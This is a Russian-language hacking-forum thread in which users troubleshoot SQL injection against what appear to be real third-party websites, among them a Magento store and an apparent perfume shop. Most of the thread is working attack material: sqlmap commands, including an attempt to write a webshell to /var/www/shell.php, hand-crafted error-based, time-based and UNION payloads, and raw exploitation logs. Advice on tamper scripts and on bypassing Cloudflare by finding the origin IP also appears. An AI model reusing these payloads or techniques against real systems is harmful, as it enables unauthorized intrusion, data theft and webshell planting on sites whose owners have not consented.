ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.06.2021, 10:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от brown
brown said:
↑
sql на магенто
/result/?q=1'
Акунетикс нашел sql даже выдернур имя БД
Код:
Code:
Proof of Exploit
SQL query - SELECT database()
admin8sasdasd
При отправке через бурп
site/result/?q=1'
Ответ:
Код:
Code:
HTTP/1.1 503 Service Unavailable
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1
Trace:
Error log record number:
Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.
Но при попытки крутануть мапом! Не видит скулю(
Пробывал --text-only
Может какой темпер есть под магенто? Тут надо руками смотреть, на что срабатывает эррор и руками под это дело подгонять уже тампер.
|
|
|
11.07.2021, 16:07
|
|
Познающий
Регистрация: 30.10.2009
Сообщений: 41
Провел на форуме:
592140
Репутация:
6
|
|
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
Код:
Code:
[INFO] retrieved: 'root@localhost'
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php
>>Не льет, хотя права есть
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell
select user()
Код:
Code:
[INFO] retrieved: 'root@localhost'
select 'test' into outfile '/var/www/test.txt'
Код:
Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported
Что можно попробовать? Или в error-based inj не выполняется into outfile ? load_file работает |
|
|
|
12.07.2021, 18:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
92829
Репутация:
212
|
|
Сообщение от Рамос
Рамос said:
↑
>>Не льет, хотя права естьПривилегии типа FILE != правам на запись в директорию
+
вы не показали привилегии юзера, root@localhost не обязательно рутовый пользователь мускула,
но я думаю вы это знаете.
Сообщение от Рамос
Рамос said:
↑
Или в error-based inj не выполняется into outfile ? По идее должен, так как юнион, еррор и тд различаются по способу получения инфы, т.е. один и тот же запрос
может быть и union и error и time-based и blind и stack queries, правда это относится не ко всем запросам и субд.
Правда мне не совсем понятно, почему отработал первый запрос, но ошибка на второй, ну да ладно.
Сообщение от Рамос
Рамос said:
↑
select user()
Код:
Code:
[INFO] retrieved: 'root@localhost'
select 'test' into outfile '/var/www/test.txt'
Код:
Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported
+
Сообщение от crlf
crlf said:
↑
Вот оно что, я его и в хвост и в гриву, а он не работает
Кстати, ещё из неприятных новостей, узнал только на днях. Оказывается в мускуле появилась опция
secure-file-priv
, которая начиная с какой-то версии,
по дефолту,
не даёт экспортиовать/импортировать файлы вне установленной директории (в
5.7.19
secure-file-priv="/var/lib/mysql-files/"). Т.е. если юзер имеет file_priv, то пока в
my.cnf
, либо при старте не будет явно указано
secure-file-priv=""
, операции, затрагивающие работу с локальной файловой системой (LOAD_FILE, INTO OUTFILE), не будут работать вне установленной директории. Для того чтобы узнать значение, нужно выполнить запрос "
SELECT @@secure_file_priv;
".
https://dev.mysql.com/doc/refman/5.7...cure_file_privВ вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.
|
|
|
|
13.07.2021, 00:34
|
|
Познающий
Регистрация: 30.10.2009
Сообщений: 41
Провел на форуме:
592140
Репутация:
6
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор. sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
Код:
Code:
[23:12:06] [INFO] fetching current user
[23:12:07] [INFO] retrieved: 'root@localhost'
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
@@secure_file_priv
Код:
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '
--technique=E
Код:
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
--technique=B
Код:
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
С правами все нормально, не могу понять только почему не выполняется into outfile
|
|
|
|
13.07.2021, 01:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
92829
Репутация:
212
|
|
Сообщение от Рамос
Рамос said:
↑
@@secure_file_priv
Код:
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '
--technique=E
Код:
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
--technique=B
Код:
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
С правами все нормально, не могу понять только почему не выполняется into outfile ну для начала стоит поставить точку с запятой в последние запросы)) хотя мб в склмап это не нужно,
давно не юзал.
+
https://github.com/sqlmapproject/sqlmap/issues/619
Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,
не знаю, я бы включил verbose на максимум, попробовал руками.
Больше, наверное, ничем не смогу помочь.
|
|
|
|
14.07.2021, 00:01
|
|
Познающий
Регистрация: 30.10.2009
Сообщений: 41
Провел на форуме:
592140
Репутация:
6
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,
не знаю, я бы включил verbose на максимум, попробовал руками. Тогда уже тут я бессылен. Либо нужно идти в другую тему или забить)
SELECT user();
qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
Код:
Code:
General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'
SELECT 123 INTO OUTFILE '/tmp/test.txt';
qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP
Код:
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr
Код:
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
Код:
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
|
|
|
|
15.07.2021, 03:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
240
Репутация:
0
|
|
IIS/dbms:mssql
boolean-based blind/error-based
1. при technique=B --is-dba=true при technique=E --is-dba=false. почему?
2. при выводе таблиц (technique=E) [WARNING] the SQL query provided does not return any output(с выводом бд все норм) common-tables выручает, но так как сайт самопис находит только 5 таблиц.
как заставить скульмап вывести таблицы ?
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118 )+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(1 13)) AND (8607=8607
Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
---
[INFO] fetching tables for database: db1
[PAYLOAD] -1789
[PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118 )+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects. name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98) +CHAR(118)+CHAR(113)) AND (2349=2349
[WARNING] the SQL query provided does not return any output
|
|
|
|
18.07.2021, 22:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
С клаудом туго, в открытом доступе тамперов под него нету. Как вариант искать реальный ИП ,что не всегда у получается
|
|
|
|
08.10.2021, 08:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
43449
Репутация:
1
|
|
Код:
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://' AND 7389=7389-- qoxM
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure
of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection d
uring usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
m'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
rposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found
|
|
|
|
08.10.2021, 11:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
10377
Репутация:
0
|
|
Сообщение от brown
brown said:
↑
Код:
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://' AND 7389=7389-- qoxM
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure
of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection d
uring usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
m'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
rposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found
Код:
Code:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
попробуй в начале с этого + уже имеющиеся тамперы, в том числе на select. Указывай verbose 3 и смотри
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
